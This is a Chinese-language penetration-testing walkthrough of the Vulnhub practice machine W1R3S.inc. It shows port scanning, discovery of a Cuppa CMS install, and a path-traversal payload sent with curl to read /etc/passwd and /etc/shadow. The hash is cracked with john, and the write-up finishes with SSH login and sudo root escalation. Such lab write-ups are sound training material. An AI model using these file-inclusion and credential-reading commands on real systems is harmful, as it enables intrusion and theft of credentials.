Vulnhub靶机 W1R3S.inc（渗透测试详解）

一、靶机配置

1、靶机下载地址

https://www.vulnhub.com/entry/w1r3s-101,220/

2、修改靶机网卡

 二、web渗透测试

1、靶机IP扫描

2、靶机IP、端口服务版本扫描

nmap -sS -sV -A -p- 192.168.31.144

发现有ftp的21端口，并且允许匿名用户登录anonymous ，接着就是ssh的22端口，80端口和mysql的3306端口，并且3306端口并不是管理员端口

3、访问靶机主页

4、对靶机进行目录探测

发现了/administrator/index.php,/wordpress/wp-login.php这俩目录

4、拼接访问

拼接/wordpress/wp-login.php，是个登录框

拼接/administrator/installation/

并且是个Cuppa CMS

4、使用whatweb扫描该网址信息

发现网站是Apache2.4.18，Cuppa CMS 搭建的

4、使用searchsploit命令查询Cuppa cms是否存在漏洞

searchsploit cuppa cms

发现一处漏洞，将它下载下来

searchsploit cuppa cms -m 25971.txt

查看25971文件

查看漏洞详情得知, 该cms可通过文件包含漏洞读取任意文件, 我们选取其中一个payload

4、文件包含漏洞读取任意文件

这里我直接访问/etc/passwd

http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

发现访问不到

5、可能是需要post访问，使用curl工具以post方式获取信息

curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.31.144/administrator/alerts/alertConfigField.php

成功获取到/etc/passwd内容

发现了w1r3s的用户和root有/bin/bash权限

6、查看/etc/shadow文件，获取密码信息

 curl -s  --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.31.144/administrator/alerts/alertConfigField.php

发现有www-data和w1r3s的加密过的密码，因为只有w1r3s用户有权限，所以主要拿w1r3s的密码来爆破，这里使用kali自带的john工具爆破解密，先将用户和加密的密码复制到一个文本，再爆破

vi 1.txt
john 1.txt

得到密码为computer

7、前面扫描端口，知道22端口开发，尝试连接

ssh w1r3s@192.168.31.144

成功连接

三、提权

1、输入sudo -l 查看此用户权限

发现该用户是全权限

2、直接sudo su 获取root权限

提权成功！！！